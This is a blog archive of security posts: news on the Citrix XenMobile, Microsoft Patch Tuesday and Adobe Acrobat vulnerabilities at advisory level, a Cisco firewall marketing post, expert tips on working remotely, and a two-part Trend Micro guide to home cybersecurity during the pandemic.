Category Archives: security

Citrix fixed flaws in XenMobile that will be likely exploited soon

Citrix addressed multiple vulnerabilities in Citrix Endpoint Management (XenMobile) that can be exploited by an attacker to gain administrative privileges on affected systems.

The Citrix Endpoint Management (CEM), formerly XenMobile, is software that provides mobile device management (MDM) and mobile application management (MAM).

The vulnerabilities that impacted the Citrix XenMobile were tracked as CVE-2020-8208, CVE-2020-8209, CVE-2020-8210, CVE-2020-8211, and CVE-2020-8212. Citrix confirmed that these flaws could be chained to allow a remote unauthenticated attacker to gain administrative control of a Citrix Endpoint Management (CEM) server,

The impact of the issues depends on the specific version of the software. The vulnerabilities impacting XenMobile server 10.12 before RP2, 10.11 before RP4, 10.10 before RP6, and all versions before 10.9 RP5 have been rated as critical. For XenMobile Server versions 10.12 before RP3, 10.11 before RP6, 10.10 before RP6, and releases prior to 10.9 RP5, the issues have been rated medium or low.

“Today we posted a Security Bulletin covering a set of vulnerabilities in certain on-premises instances of Citrix Endpoint Management (CEM), often referred to as XenMobile Server.” reads the advisory published by Citrix.

“The latest rolling patches that need to be applied for versions 10.9, 10.10, 10.11, and 10.12 are available immediately. Any versions prior to 10.9.x must be upgraded to a supported version with the latest rolling patch.”

The company notified its customers on July 23 and shared details for the issues with the national CERTs around the world.

The company did not provide technical details on the addressed vulnerabilities but revealed that it pre-notified CERTs and customers on July 23. The company is urging users to upgrade their systems.

“We recommend these upgrades be made immediately. While there are no known exploits as of this writing, we do anticipate malicious actors will move quickly to exploit,” continues the advisory.

The flaws were reported by Andrey Medov of Positive Technologies, Glyn Wintle of Tradecraft, and Kristian Bremberg of Detectify.

Experts pointed out that the flaws aren’t trivial to exploit, in order to exploit the issue the attackers need to access target network.

Pierluigi Paganini

(SecurityAffairs – hacking, XenMobile)

The post Citrix fixed flaws in XenMobile that will be likely exploited soon appeared first on Security Affairs.

Microsoft August 2020 Patch Tuesday fixed actively exploited zero-days

Microsoft August 2020 Patch Tuesday updates addressed 120 vulnerabilities, including two zero-days that have been exploited in attacks.

Microsoft August 2020 Patch Tuesday updates have addressed 120 flaws, including two zero-day vulnerabilities that have been exploited in attacks in the wild.

The two issues are a Windows spoofing bug and a remote code execution flaw in Internet Explorer.

The Windows spoofing flaw, tracked as CVE-2020-1464 can be exploited by an attacker to bypass security features and load improperly signed files. The flaw is related to Windows incorrectly validating file signatures.

“A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files.” reads the advisory published by Microsoft.

“In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded.”

The flaw affects many Windows OSs, including Windows 7 and Windows Server 2008, for which the IT giant will not provide security updates because the reached the end-of-life.

Microsoft confirmed that threat actors are actively exploiting the issues in attacks against Windows systems but it did not provide technical details about the attacks.

The second zero-day addressed by Microsoft is tracked as CVE-2020-1380, it is a remote code execution issue that affects the scripting engine used by Internet Explorer. The flaw is related to the way the engine handles objects in memory, it could be exploited by tricking victims into visiting a malicious website, or by opening a malicious Office document, or through a malvertising attack.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system.”

The RCE vulnerability was discovered by security researchers at Kaspersky.

Microsoft also addressed other 15 critical vulnerabilities that impact Windows, the Edge and Internet Explorer browsers, Outlook, and the .NET framework. Most of the vulnerabilities are remote code execution issues.

Microsoft August 2020 Patch Tuesday also fixed over 100 vulnerabilities, rated as important, impacting Windows, Dynamics 365, Office, Outlook, SharePoint, and Visual Studio Code. These flaws can be exploited for remote code execution, privilege escalation, XSS attacks, DoS attacks, and to disclose information.

The full list of flaws addressed by Microsoft August 2020 Patch Tuesday is available here.

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft August 2020 Patch Tuesday)

The post Microsoft August 2020 Patch Tuesday fixed actively exploited zero-days appeared first on Security Affairs.

Adobe Acrobat and Reader affected by critical flaws

Adobe has released security updates to address twenty-six vulnerabilities in the Adobe Acrobat, Reader, and Lightroom products.

Adobe has released security updates to address tens of vulnerabilities in Adobe Acrobat, Reader, and Lightroom products.

Eleven out of twenty-six flaws are rated as ‘Critical’ because they could be exploited by attackers to remotely execute arbitrary code or bypass security features on vulnerable computers.

APSB20-48 Security updates available for Adobe Acrobat and Reader

Adobe has released security updates that address 25 vulnerabilities in Adobe Acrobat and Reader products, 11 flaws are rated as ‘Critical.’

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by the company.

Below the list of the addressed issues.

Vulnerability CategoryVulnerability ImpactSeverityCVE Number
Disclosure of Sensitive DataMemory LeakImportant   CVE-2020-9697
Security bypass Privilege Escalation ImportantCVE-2020-9714
Out-of-bounds writeArbitrary Code Execution         Critical CVE-2020-9693CVE-2020-9694
Security bypassSecurity feature bypassCritical CVE-2020-9696CVE-2020-9712
Stack exhaustionApplication denial-of-serviceImportant CVE-2020-9702CVE-2020-9703
Out-of-bounds readInformation disclosureImportant CVE-2020-9723CVE-2020-9705CVE-2020-9706CVE-2020-9707CVE-2020-9710CVE-2020-9716CVE-2020-9717CVE-2020-9718CVE-2020-9719CVE-2020-9720CVE-2020-9721
Buffer errorArbitrary Code Execution         Critical CVE-2020-9698CVE-2020-9699CVE-2020-9700CVE-2020-9701CVE-2020-9704
Use-after-free   Arbitrary Code Execution         Critical CVE-2020-9715CVE-2020-9722

APSB20-51 Security update available for Adobe Lightroom

Adobe has released a security update to address a DLL hijacking vulnerability in Adobe Lightroom that could be exploited by an attacker to execute commands with elevated privileges.

“Adobe has released updates for Adobe Lightroom Classic for Windows and macOS. This update addresses an important vulnerability. Successful exploitation could lead to privilege escalation in the context of the current user.” reads the advisory.

An attacker can exploit the flaw to get his malicious DLL being loaded at the launching of the software.

Vulnerability CategoryVulnerability ImpactSeverityCVE Numbers
Insecure Library LoadingPrivilege escalationImportantCVE-2020-9724

Adobe has released Lightroom Classic 9.3 to address the vulnerability.

Users of these products are recommended to upgrade to the latest versions as soon as possible.

Pierluigi Paganini

(SecurityAffairs – hacking, Adobe Acrobat)

The post Adobe Acrobat and Reader affected by critical flaws appeared first on Security Affairs.

Cisco Named a Leader in the 2020 Forrester Wave for Enterprise Firewalls

The firewall has long been foundational to any organization’s security posture. But the antiquated notion of a single network control point no longer works as our applications and data move to the cloud and our users are everywhere. Organizations are augmenting their traditional firewalls with a variety of physical and virtual appliances – some are embedded into the network, others are delivered as a service, are host-based, or even included as native controls within public cloud environments.

At Cisco, we’re aware of the challenges of managing this myriad of security controls needed to protect the modern enterprise. We also comprehend the issues associated with the rise of mobility and IoT with the evolution of 5G and Wifi6, adoption of cloud services, workloads and data to moving into multiple clouds / SaaS services, and users and things accessing the data outside the enterprise perimeter. We’ve been on a journey to simplify and integrate our solutions and provide a more holistic foundation for network security based on the concept we call firewalling. That is, delivering world-class security controls with common policy and threat visibility everywhere you need it.

I’m excited to share that Cisco was named a leader in the just-published report; The Forrester Wave™: Enterprise Firewalls, Q3 2020. In it, Forrester calls out our work integrating the firewall with other technologies “The vendor’s acquisitions of SourceFire, OpenDNS, and Duo integrate well into its enterprise firewall and associated services. The vendor’s Umbrella platform maps to a Zero Trust edge approach and incorporates major security services, like firewalls and CASBs, that can be cloud-delivered.” Get a copy of Forrester’s report here.

We believe that the superior level of integration between our firewall and other security technologies offer customers seamless interoperability with their existing security infrastructure, including third-party technologies, resulting in unified visibility, automation, more robust defenses, and improved threat efficacy. These capabilities are foundational for organizations looking to adopt a more comprehensive firewalling strategy.

Imagine shared security policies, centralized logging, and threat intelligence across your extended environment. You’ll have a unified firewalling experience with physical and virtualized appliances, the Umbrella cloud-delivered firewall, and even control for applications and workloads with Cisco Tetration. We are uniquely positioned to allow customers to choose the right security controls and offer flexible deployment in their environments. You’ll be prepared to protect:

  • Traditional, cloud, micro-segmented, and de-perimeterized networks
  • Endpoints, with class-leading DNS, EDR, and VPN security
  • Cloud applications, micro-segmentation, and containers

The Cisco firewall portfolio delivers greater protection to your network against advanced and zero-day threats by leveraging features like IPS, Advanced Malware Protection, URL filtering, and sandboxing. These are powered by Cisco Talos, our industry-leading threat intelligence research organization. Talos defends Cisco customers by finding new malware domains, malicious URLs as well as unknown or undisclosed vulnerabilities, and writing rules to help mitigate them. We also offer a variety of management options (cloud-delivered, centralized, and on-box) tailored to meet your environment and business needs.

What’s more, Cisco firewalls now come with Cisco SecureX built-in, unlocking your security products’ full potential across the network, user, endpoint, cloud, and applications. SecureX brings together the various capabilities across our Cisco Security portfolio and third-party technologies, to enable intelligence sharing and coordinated response.

Consider a firewall not as a standalone solution, but as part of an open, integrated platform that will scale to support your organization’s growth and innovation.

Download a copy of The Forrester Wave™: Enterprise Firewalls, Q3 2020 and explore Cisco firewalls.

The post Cisco Named a Leader in the 2020 Forrester Wave for Enterprise Firewalls appeared first on Cisco Blogs.

Adapting to a New Way of Working in 2020

In the spring of 2020, organizations sought to protect their workforce by mandating and enabling their employees to work from home. While necessary for saving lives, this experience physically separated security professionals from their own teams, from the employees who depend on them, and from the systems they’re responsible for. The new work arrangement also placed greater strain on some personnel during an already stressful time.

That’s not to say that we can’t find ways to adapt to this new way of working. In the spirit of this reality, we asked several thought leaders in the industry to share their recommendations on how security teams can make the most of this change and set a strategy that works for the future. Here’s what they had to say.

Cheryl Biswas | Specialist, Cyber Threat Intelligence Program, Global Bank | @3ncr1pt3d | (LinkedIn)

Remote work has been a huge adjustment for many. For some, this has been very isolating. For others, it’s been hard dealing with the uncertainty.

You should set up time with your team or co-workers to meet regularly. We do a daily sync in the mornings. It’s not structured. We can talk about anything including work. It lets us connect with each other, and it’s really strengthened our team.

Also, set a schedule so that work is not all day, every day. Use visual management aids like wall calendars and white boards to track time, deliverables, events, etc. And make sure you take time to get outside, take a walk, get up, and stretch regularly.

Stephanie Ihezukwu | Cloud Security Operations Analyst II at Duo Security, Cisco | @StephandSec | (LinkedIn)

It is 100% normal to not perform as you normally do. This is not normal. We are all reacting to this in different ways. Some of us are lucky enough to be productive during this time. Some of us are barely holding on. Make sure you work WITH yourself, not against yourself. If that means taking time off or speaking with your boss about your struggles, do so.

However, do not stay down for too long. Feelings and emotions only last for 90 seconds. Our thoughts can push them to last a lot longer than that. Give yourself a day or two and then try again.

Also, maintain connections with your colleagues, family, and friends. Try to take regular breaks. Go back to things you used to do for fun but which life has caused you to forget. Get outside. But remember, you need to be well in order to do the awesome work you do, so take care of yourself.

Most importantly, taking your lunch as well as short breaks is crucial for your well-being and sanity. Keep in mind that working remotely (or from home) is a bit different than working remotely during a pandemic, so have patience and don’t be afraid to recalibrate and shift until you find what works for you.

Isiah Jones | Owner & SR ICS OT Cybersecurity Consultant | @blackCyberDude | (LinkedIn)

I’ve spent most of the last six years working remote plus global travel, and much of the last 15 years working with geographically dispersed teams (especially since I came from DoD, including Navy civil service). As a result, I don’t see this as being anything new, special, or different than what has already been shared by many of us for over a decade in terms of security advice.

My advice to people for this time is to use basic sense and start following the advice that has already been around. Don’t overthink and emotionally complicate things. If anything, the move to telework should finally force people to start doing what they should have been doing the last 10 years.

My advice is to follow the security controls and best practices that already exist for mature levels of handling insider threats, access control, change control, configuration management, asset inventory details, as well as secure remote access. (NIST SP 800-53, CIS Top 20 Critical Security Controls, etc.) Don’t make it overly complicated on the ICS side, which is my focus (not IT). It’s the same advice, but they should focus on ISA/IEC 62443 and ISA84 security and safety standard requirements for ICS OT equipment, people, and operations.

Mark Weatherford | Chief Strategy Officer for the National Cybersecurity Center | @marktw | (LinkedIn)

1. Don’t forget that while this situation has caused us to focus intently on tactical challenges, if you are a CISO, your job is also to keep your eye on the strategic direction of the security program. Your CEO might cut you some slack, but your regulator probably won’t.

2. Take advantage of the crisis and lean on your vendors for more support, product upgrades, and better pricing. Most vendors will find a way to work with you rather than potentially lose you as a customer.

3. Remote workers have increased the pressure on security teams to implement more robust endpoint monitoring and identity and access management (IAM) solutions. Use the crisis to get more internal support and budget to move these kinds of initiatives forward.

Jenny Radcliffe | People Hacker & Social Engineer | @Jenny_Radcliffe | (LinkedIn)

As a host of the Human Factor Security Podcast, we pivoted during this time and did the “Lockdown Diaries.” We interviewed a lot of people about what they were doing to cope with this sort of “new normal” through the lockdown period and beyond, and nearly everyone said what really helped them was having a routine.

So, on an individual basis, having a routine helps you cope, helps you get into work mode. It’s very difficult if you don’t have your own space to work in. We’re working from home, and not everyone has a designated office space. So, if companies can take account of that and perhaps not be so rigid as they’re used to being with working hours and other things, that really helps employees.

People can relax into this new way of working. I think we’ll find that people want to work to outcomes and objectives as opposed to the clock. If we can be flexible about how people best fit into this new style of working, I think that would be very helpful for businesses to get the most out of their staff at this time.

Matt Pascucci | Sr. Cyber Security Practice Manager | @MatthewPascucci | (LinkedIn)

Throughout the past couple months, the entire world has made a dramatic shift to how they’re working not only from an employee perspective but also from an operational standpoint. For companies that weren’t geo-diverse before the pandemic, this caused fear and anxiety. There has frequently been the pull to allow flexible work to employees as a perk, but the fear of completely breaking the mold had held institutions back from attempting it. With the pandemic thrusting most of the world on some form of lockdown, we had to evolve.

Some of the major security concerns came from having the threat landscape expanded by having students, children, and spouses all working remotely under their personal wireless network. The lack of full segmentation on these systems allows risks from one system to spread to others, potentially spreading back into their organizations.

With all these changes, I’ve seen companies start focusing on the shifting criticality of externally exposed infrastructure with a solidarity from the security and business teams. As an example, remote access tools like VPNs have become not only a business enabler, but also a critical system to have business continue. These shifts show that we’re adaptable to times of crisis and can securely and effectively work remotely.

There have also been changes to how leadership is required to work with a remote work staff. Many are doing this already, but when a sea change came upon us, the management styles of leaders were put to the test. With proper objectives, results, and oversight, the remote workforce can act just as organized if not better than a typical on-premise office, depending on the function of the employee.

Zoë Rose | Cyber Investigator | @RoseSecOps | (LinkedIn)

To embrace this new way of working, you should look for what works for you. Working remotely/from home/not-office location is about flexibility, inclusion, and creating a space where you’re best supported. For some, that means going to an office, and I believe in the future, that should be available but with a non-mandatory approach.

For others, public transport isn’t feasible. Owning a vehicle isn’t possible and going into the office each and every day doesn’t work. Therefore, creating an office space at home or nearby is perfect.

I like a routine. I get up and make a cuppa, let the ferrets out, sit down, and start things up. This routine helps me in days when I can’t be bothered and days when I’m overwhelmed. However, finding a routine I can stick to wasn’t exactly simple. In a home environment, it requires flat mates to stick to their routine as well, and if I’m honest, I get frustrated when they don’t.

Why is routine so important? Well, it helps me quickly identify the normal in my environment. When things stick out, I question them. At times it’s simply a difference that isn’t threatening. Other times, it’s an event in need of investigation. That routine, behavior, consistency is how I help not-as-technically-minded teammates to identify things that require escalation.

Chloe Messdaghi | VP of Strategy, Point3 Security, Inc. | @ChloeMessdaghi | (LinkedIn)

A majority of breaches happen because employers are not investing in their employees. When we do not invest in our team, we become a threat to ourselves. To support one’s security team, it’s critical to provide ongoing training and support around mental health. Within InfoSec, we have a problem with burnout because we struggle to balance our work and personal life.

As a company or a leader, it is your job to make sure your employees are feeling balanced by providing resources and support. Lastly, remember you wouldn’t have a product if you didn’t have a security team. So, treat them well. Your company depends on it.


Victor Keong | Senior CISO Advisor, Asia Pacific at Cisco | @vkeong | (LinkedIn)

The sudden shift to work from home has brought both opportunities and threats for security leaders. On the opportunities side, we’ve seen some of our CISO customers using the reduced-time-to-decision to accelerate the implementation of certain security solutions, which support organizations’ overall digital transformation.

Equally, we’ve also witnessed an increased review of key security processes such as securely managing remote users and reviewing their access rights, especially privileged users. Working from home also means an introduction of a whole slew of BYOD issues, which warrants a review of BYOD/acceptable use policies as well as a renewed focus on remote device management execution.

On the threats side, bad actors have been taking advantage of COVID-19 in phishing campaigns, but again, this brings an opportunity for anti-phishing awareness and ongoing education to the fore. It also underscores how the education of users on new security implementations are a necessary part of an organization’s digital transformation curriculum.

Tricia A. Howard | Marketing Manager at HolistiCyber | @TriciaKicksSaaS | (LinkedIn)

It’s no secret that this situation has really messed with the way we work these past couple of months. For some of us, it might not be ending anytime soon. Even though things are starting to open back up, companies are realizing that they might not even need a brick-and-mortar office. That means that this “work-from-home” life could become a lot more permanent.

If you find yourself in this scenario, it’s important to have a distinction from your work-from-home life and your home-from-home life. Sometimes, that’s easier said than done.

One of the things that’s helped me a lot is trying to emulate my commute as much as possible both in the morning when I’m starting the day and also when I’m done for the day. By listening to music, listening to a podcast, or walking my dog for around the time that it would normally take for me to get into the office, it helps me mentally prepare for the day and also shut down whenever I am done working. It’s been extremely helpful.

Gabriel Whalen | Principal Field Solution Architect – Information Security at CDW | @Ghostmath1 | (LinkedIn)

Before this year, my recommendation to every organization was to consider implementing a security framework. All too often, there is a focus on having a “blinky box,” rather than testing or implementing non-technical (administrative and physical) security controls. It doesn’t matter if an organization has the best-in-class technical solution if they don’t have visitor access policies, locks on doors, a cadence of reviewing and improving security controls, etc.

The next level is actually executing a business impact analysis and implementing business continuity plans and exercises. Generally speaking, many organizations I speak with are focused on those annual or otherwise required technical tests, but it’s always on my list of proactive recommendations.

Now, I’m definitely hearing that more organizations looking at business continuity not only prepare for the uncertain, but also increase awareness of critical asset reliance beyond traditional silos in business units. This is an excellent second order result of the business impact analysis and business continuity planning and testing, as it really contributes to the maturation of an organization’s security posture and ROI.

Dave Lewis | Global Advisory Chief Information Security Officer, Cisco | @gattaca | (LinkedIn)

We have now arrived at a point in time where this is not the new normal so much as the day-to-day business. Now that we’re moving into the acceptance phase of the way to get work done, we need to make sure we’re keeping a keen eye on three elements, with the human element being primary.

For most people working remotely, this is a completely new experience. Sure, they had taken the occasional Friday, but working as a dedicated remote staffer is another thing entirely. We as security practitioners need to be there to provide guidance more so than in previous years.

The second element to keep in mind is the use of defined, repeatable processes. Having people working remotely will help to draw this need in clear definition. The chance for things to go wrong is compounded by having this lack of face-to-face interactions.

The third element to keep in mind for the remote working force is the democratization of security. We have to be sure to provide security tools such as MFA to our employees that enable them to do their jobs safely and securely.


Adjusting to Extraordinary Times Cover Photo
For additional perspectives on how employees can make the most of remote work, please download Cisco’s eBook, Adjusting to Extraordinary Times: Tips from Cybersecurity Leaders Around the World.

This is a series of blogs sharing insights into how organizations are adapting their cybersecurity strategies during these extraordinary times. Other blogs in the series include: Experiences from Cybersecurity Leaders in Extraordinary Times: Adjustments and Outcomes


The post Adapting to a New Way of Working in 2020 appeared first on Cisco Blogs.

Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World

Welcome to the new normal. We’re all now living in a post-COVID-19 world characterized by uncertainty, mass home working and remote learning. The lines demarcating normal life have shifted abruptly – perhaps never to return. That’s not the worst that can happen, as we all know, but it does mean we all need to get used to new ways of living, working and studying from home. This has major implications for the online safety, security and privacy of our families.

To help you adapt to these new conditions while protecting what matters most, Trend Micro has developed a two-part blog series on “The New Normal.” Part 1 identifies the scope and specific cyber-threats of the new normal. Part 2 provides security tips and products to help address those threats.

What’s going on?

In April, nearly 300 million Americans were estimated to be in government-mandated lockdown. Even as some businesses, municipalities and states begin to relax these rules, experts have warned of subsequent waves of the virus, which could result in new localized lockdowns. In short, a lot of people will continue to work from home, while their children, also at home, attempt to study remotely from their mobile devices.

This has considerable implications for how we spend our time. Without that morning commute to work or school, more of it than ever will involve sitting in front of a desktop, laptop, tablet or smartphone screen. Even the smart TV is enlisted. Dangers include

  • Use of potentially insecure video conferencing applications. The number of daily meeting participants on Zoom surged from 10 million in December 2019 to roughly 200 million in March.
  • Visits to P2P/torrent sites or platforms for adult content. In search of entertainment, bored kids or teens in your household may have more time and inclination to do this.
  • Downloads of potentially malicious applications disguised as legitimate entertainment or gaming content.
  • More online shopping and banking. June alone generated $73.2 billion in online spend, up 76.2% year-on-year. Whenever you shop or bank online, financial data is potentially exposed.
  • Use of potentially insecure remote learning platforms. Educational mobile app downloads increased by a massive 1087% between March 2 and 16. The trend continues.
  • Logging on to corporate cloud-based services. This includes Office 365, to do your job remotely, or using a VPN to connect directly into the office.
  • For recreation, streaming and browsing on your smart TV. But even your smart TV is vulnerable to threats, as the FBI has warned.

Risky behavior

Unfortunately, the increase in working from home (WFH), especially for those not used to it, may lead to an increase in risky behavior, such as: using non-approved apps for work; visiting non work-related sites on work devices; and using personal devices to access work resources. Recent global Trend Micro research found that:

  • 80% have used their work laptop for personal browsing, with only 36% fully restricting the sites they visit.
  • 56% of employees have used a non-work app on a corporate device, and 66% have uploaded corporate data to it.
  • 39% often or always access corporate data from a personal device.
  • 8% admit to watching adult content on their work laptop, and 7% access the dark web.

This is not about restricting your freedom to visit the sites you want to visit while at home. It’s about reducing the risk of exposing corporate data and systems to possible malware.

What are the bad guys doing?

Unsurprisingly, there has also been a major uptick in the volume of cyber-threats targeting home users. With a captive audience to aim at, it’s a huge opportunity for cyber-criminals to steal your log-ins and personal data to sell to fraudsters, or even to steal corporate passwords and information for a potentially bigger pay-off. They are helped by the fact that many home workers may be more distracted than they usually would be at the office, especially if they have young children. Your kids may even share the same laptops or PCs as you, potentially visiting risky sites and/or downloading unapproved apps.

There’s also a chance that, unless you have a corporate machine at home, your personal computing equipment is less secure than the kit you had in the office. Add to that the fact that support from the IT department may be less forthcoming than usual, given that stretched teams are overwhelmed with requests, while themselves struggling to WFH. One recent report claimed that nearly half (47%) of IT security pros have been taken off some or all of their typical security tasks to support other IT-related jobs. In another, only 59% of respondents said they believe their cybersecurity team has the right tools and resources at home to perform their job effectively.

It’s time to step up and take security into your own hands. Stay on the lookout for the following threats.

  • Unsecured home routers and smart devices might be hijacked in more sophisticated attacks designed to steal data from corporate networks via the home worker.
  • Phishing attacks spoofing well-known brands or using COVID-19 information/news as a lure. Google is blocking 18 million malicious pandemic-themed emails every day. The end goal may be to hijack your online consumer accounts (Netflix, banking, email, online shopping) or work accounts. Other phishing emails are designed to install data-stealing malware, ransomware and other threats.
  • Attackers may target vulnerabilities in your home PCs and the apps you’re using (video conferencing etc) to gain remote access.
  • Business Email Compromise (BEC) attackers may try to leverage the lack of internal communications between remote workers to impersonate senior execs via email, and trick finance team members into wiring corporate funds abroad.
  • Kids exposing home networks and devices to malware on torrent sites, in mobile apps, on social media, and via phishing attacks potentially imitating remote learning/video conferencing platforms.
  • Kids searching for adult/inappropriate content, and/or those that are bored and over-share on social media. Unicef has warned that millions of children are at increased of online harm as lockdown means they spend more of their days online.
  • Mobile apps represent a potential source of malware, especially those found on unofficial app stores. There has also been a reported 51% rise in stalkerware – covert surveillance apps used by domestic abusers and stalkers to target victims.
  • The pandemic has led to a surge in e-commerce fraud where consumers are tricked into buying non-existent products or counterfeit goods including medical items.

So what’s a remote worker/concerned parent to do to protect themselves and the family in the midst of the “new normal?”

Read Part 2 in this mini-series, which we’re publishing simultaneously with Part 1, where we share some best practice advice on how to keep your digital lives and work systems safe from online threats during lockdown—and where we provide tools to help you do just that.

The post Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World appeared first on .

Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World (part 2)

The past few months have seen radical changes to our work and home life under the Coronavirus threat, upending norms and confining millions of American families within just four walls. In this context, it’s not surprising that more of us are spending an increasing portion of our lives online. But this brings with it some familiar cyber-risks. In Part 1 of this mini-series, we explained how cyber-criminals are looking to capitalize on these sweeping changes to society to further their own ends.

Now let’s take a look at what you can do to protect your family, your data, and access to your corporate accounts.

How you can stay safe online

The bad guys are laser-focused on stealing your personal data and log-ins and increasingly see the remote worker as an easy target for leapfrogging into corporate networks. That’s not to mention the potential internet safety risks inherent in bored kids spending more time in front of their screens. To respond, you’ll need to create an equally focused “home security plan” governed by sensible policies and best practices. Here are some of the key areas to consider.

Protect your smart home and router

Increasingly, unprotected smart home devices are being targeted by cyber-criminals to turn into botnets to attack others. They might also provide sophisticated attackers with a stepping-stone into your corporate systems, via the home network. The home router, with its known flaws, is (after the modem) the digital front door to the smart home and the basis for your networking, so it should be first in any security strategy. Consider the following when tackling home network security:

  • Regularly check for router firmware updates and apply as soon as they’re available. (If you’re using a home gateway (modem + router) firmware updates are done by your ISP, so you won’t have the option to do this.)
  • Change factory default admin passwords and switch on two-factor authentication if available.
  • Disable UPnP and any remote management features.
  • Use WPA2 on your router for encrypted Wi-Fi. Pick passwords for access that aren’t easily guessed.
  • Put the router in middle of house if possible, so the signal is not overly exposed to strangers outside. Likewise for extenders.
  • Invest in security for the entire home network from a reputable provider like Trend Micro.

Secure your home office

Cyber-criminals are primed to take advantage of distracted home workers and potentially less secure PCs/devices. Secure this environment by doing the following:

  • Again, apply a home network security solution. This protects your work devices, while also protecting the devices you use for recreation.
  • Apply any security updates to OS/software.
  • Install/maintain endpoint security software on all machines/devices.
  • Never use work laptops for personal use.
  • Switch on 2FA for any work accounts.
  • Use a VPN if applicable whenever connecting to the office.
  • Stay alert to phishing/BEC attempts.
  • Take advantage of any training courses to stay up-to-speed on the latest scams.
  • Disable macros in Office files – these are often used by hackers to run malware.

Stay safe from phishing

Phishing is the number one tactic used by attackers to trick you into installing malware or handing over your log-ins. Emails, text messages, social media messages and more are spoofed to appear as if sent by a legitimate company or contact. In response:

  • Be cautious of any unsolicited emails/texts/messages even if they appear legitimate.
  • Don’t click on any links/buttons in unsolicited messages, or download attachments.
  • Check directly with the sender rather than clicking through links or buttons provided or entering any confidential details.
  • Invest in cybersecurity tools from a trusted vendor like Trend Micro, to spot and block scam emails and malicious downloads/websites.

Use video conferencing safely

New videoconferencing platforms can introduce risk, especially if you’re not familiar with the default settings. Here’s how to stay safe when video conferencing:

  • Check first for end-to-end encryption.
  • Only download videoconferencing apps from official iOS/Android stores and manufacturer websites.
  • Get familiar with privacy settings. Switch off camera access if you don’t want to appear on-screen.
  • Ensure you’re always on the latest software version.
  • Never click on links/open attachments in messages from unknown contacts.
  • Use a password manager to store long and strong log-ins, and switch on two-factor authentication (2FA) if available.

Stay safe shopping and banking

Next, protect your financial information and stay safe from e-commerce fraud by doing the following:

  • Install AV on all PCs and devices.
  • Always use the latest browser versions and HTTPS sites.
  • Never click through on sensational promos or ads on social media/in emails. Always visit the site directly.
  • Always be cautious: if special offers seem too good to be true, they usually are.
  • Use a secure browser, password manager, and 2FA in your online accounts.
  • Use a VPN app on any device you use to shop or bank.

Think about online safety for kids

They may be under your roof for more hours of the day than usual, but your children are also likely to be spending more time online. That means you need to have a measured conversation with them about internet safety, backed up with parental controls. Consider the following:

  • Urge your kids to think before clicking, and before sharing on social media.
  • Make sure you have installed anti-malware from a reputable vendor on all their devices.
  • Look for security products that check/update their social media privacy settings.
  • Discourage or block downloads from P2P sites.
  • Set up parental controls to block inappropriate content and/or to regulate screen time and time on certain sites or with certain apps. Then set up admin protections, so they can’t change the settings.
  • Share your concerns around sexting.

Mobile security best practices
Finally, sheltering at home has limits, particularly for restless kids. When they go to the store or out to the park, facemasks notwithstanding, they’re likely going to use their mobile devices, just as they’ll continue to do at home. Of course, you’re not exempt either from mobile threats. Ensure mobile security by

  • Sticking to the official Google Play and App Store marketplaces. Enforce this through smart settings on your children’s phones.
  • Running anti-malware on your mobile device, from a reputable company like Trend Micro.
  • Ensuring your family’s devices are using the latest OS version.
  • Ensuring your family devices have remote lock and wipe feature switched on, in case they’re lost or stolen.
  • Never brick or jailbreak the device, as this can expose it to security risks.

How Trend Micro can help

When it comes to protecting the home from security and privacy threats during lockdown, leave no stone unturned. Cyber-criminals will always look for the weak link in the chain and focus their efforts there. Network security is important, but it doesn’t replace the need for protection on each individual device. You’ll need to cover your router, network, smart devices, and all endpoints (PCs, laptops, mobiles and other devices). Here’s how Trend Micro can help:

Trend Micro Home Network Security

Trend Micro Home Network Security provides industry-leading protection against any threats to internet-connected devices in the home. The solution

  • Blocks dangerous file downloads during web browsing to stop ransomware, data theft, phishing, and other malware. Blocks remote access applications.
  • Protects all smart devices, such as smart TVs, thermostats, security cameras, etc., that don’t have their own security solutions.
  • Parental Controls and Guardian allow parents to track and restrict their children’s internet usage at home and on-the-go, which could free-up bandwidth for important conference calls.

Trend Micro Security (PC and Mac)

Trend Micro Security, available in various editions (led by Trend Micro Maximum Security), is Trend’s flagship endpoint security product for consumers. Available for both PCs and Macs, it features AI learning to stop advanced threats. Among a wide range of protections, it includes:

  • Web Threat Protection when browsing the internet, defending you against bad websites that can steal your data or download malicious files.
  • Machine Learning, to protect you from new and unknown threats.
  • Ransomware protection via Folder Shield, to stop unauthorized changes and back-up files encrypted by suspicious programs.
  • Anti-phishing and anti-spam protection for Outlook clients, as well as Gmail and Outlook webmail on the PC, and Gmail webmail on the Mac.
  • Privacy Scanner (for Facebook and Twitter), Social Networking Protection for protection against malicious links in social networks, Pay Guard for protecting your online banking and buying.
  • Parental Controls to limit which software and websites you kids may use.

Trend Micro Mobile Security:

Trend Micro Mobile Security provides endpoint security for all your mobile devices, whether Android or iOS-based.

  • Blocks dangerous websites and app downloads.
  • Helps protects your privacy on Twitter and Facebook.
  • Protects your kids’ devices.
  • Guards against identity theft.
  • Optimizes your device’s performance.

Additional Trend Micro Tools:

Network and endpoint security should be supplemented with tools that accomplish specific tasks, such as protecting your internet connections, your passwords, and your identity data. Trend Micro provides

  • Wi-Fi Protection/VPN Proxy One Mac | iOS. VPNs with an emphasis on web threat protection or privacy, respectively. The first is available on all four platforms; the second is targeted for Apple devices.
  • Password Manager. Manages and encrypts your passwords, and automates your logins, while ensuring you use unique, strong passwords across all of your online accounts.
  • ID Security. Tracks your credentials, particularly the ones you use for buying and banking, to see if breaches of any of your identity data have led to their sale on the Dark Web. Notifies you when it has, so you can take steps to protect it.
